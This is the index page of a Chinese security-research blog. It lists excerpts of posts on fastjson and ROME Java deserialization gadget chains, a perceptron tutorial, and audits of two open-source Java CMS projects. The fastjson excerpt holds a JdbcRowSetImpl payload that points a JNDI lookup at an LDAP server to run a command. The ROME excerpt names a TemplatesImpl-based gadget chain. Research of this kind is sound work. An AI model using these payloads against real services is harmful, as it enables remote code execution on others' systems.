N11's Blog

N11's Blog

fastjson利用链总结与SnakeYAML不出网利用链的探寻
发表于2025-05-26
Fastjson利用链JdbcRowSetImplpayload12String text = "{\"1\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"}, " + "\"2\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://127.0.0.1:1389/Deserialize/Fastjson1/Command/open -a Calculator\",...
Rosenblatt感知器与方差代价函数
发表于2025-03-12|AI-Sec
概念Rosenblatt感知器是由Frank Rosenblatt在1957年提出的一种人工神经网络模型,主要用于二元分类任务。它是早期神经网络和机器学习的重要基础之一。 主要特点 结构简单: 输入层:接收特征向量。 输出层:一个神经元,输出二元结果(如+1或-1)。 学习规则: 采用感知器学习算法,通过调整权重来最小化分类误差。 权重更新公式:wi=wi+η(y−y^)xiwi​=wi​+η(y−y^​)xi​ wi​:权重 η:学习率 y:真实标签 y^​:预测输出 xi​:输入特征 激活函数: 使用阶跃函数,输出为+1或-1。 优点 简单易实现,适合线性可分问题。 局限性 只能处理线性可分数据,无法解决非线性问题(如异或问题)。 历史意义 为后续神经网络(如多层感知器)的发展奠定了基础。 总结Rosenblatt感知器是早期的二元分类模型,尽管功能有限,但在神经网络和机器学习的发展中具有重要地位。 尝试线性散点图实现 123456789101112131415161718import numpy as np import...
Rome_deserialise
发表于2024-11-15|java代码审计反序列化
ROME概念ROME是一个可以兼容多种格式的feeds解析器 可以从一种格式转换成另一种格式 可以返回指定格式或者java对象 ROME兼容RSS(0.90-0.94,1.0,2.0) ROME提供了ToStringBean这个类,用于提供深入的toString方法对JavaBean进行操作 环境pom.xml 1234567<dependencies> <dependency> <groupId>rome</groupId> <artifactId>rome</artifactId> <version>1.0</version> </dependency></dependencies> Gadget–ysoserial12345678* TemplatesImpl.getOutputProperties()* ToStringBean.toString(String)*...
starsea-mall审计
发表于2024-11-15|java代码审计
平台搭建jdk :1.8mysql:8下载链接:https://github.com/StarSea99/starsea-mall 修改src/main/resources/application.propertiesdata.username/data.passwd自己搭建数据库并连接 复现分析 目录结构首先尝试分析架构 表现层(Presentation Layer): controller 和 interceptor 属于这一层,负责处理HTTP请求和响应。 业务逻辑层(Business Logic Layer): service 属于这一层,负责处理业务逻辑。 数据访问层(Data Access Layer): dao 和 entity 属于这一层,负责与数据库进行交互。 配置层(Configuration Layer): config 属于这一层,负责项目的全局配置。 通用层(Common Layer): common 和 utils 属于这一层,提供通用的工具和常量。 数据传输层(Data Transfer...
ofcms审计
发表于2024-10-20|java代码审计
环境搭建工具:IDEA 2024jdk:1.8maven:3.9mysql:9.0communitytomcat:8.5 大致框架1234567891011121314151617181920212223242526272829303132333435363738394041ofcms-admin -admin -controller -domain -service -task -core -config -handler -interceptor -plugin -render -uitle -front -controller -templateofcms-api -cms -api -serviceofmcs-core -core -annatation -api -method -route...
1
avatar
N11
文章
5
标签
0
分类
3
Follow Me
公告
This is my Blog
最新文章
fastjson利用链总结与SnakeYAML不出网利用链的探寻2025-05-26
Rosenblatt感知器与方差代价函数2025-03-12
Rome_deserialise2024-11-15
starsea-mall审计2024-11-15
ofcms审计2024-10-20
分类
  • AI-Sec1
  • java代码审计3
    • 反序列化1
归档
  • 五月 2025 1
  • 三月 2025 1
  • 十一月 2024 2
  • 十月 2024 1
网站信息
文章数目 :
5
本站访客数 :
本站总浏览量 :
最后更新时间 :
©2019 - 2025 By N11
框架 Hexo|主题 Butterfly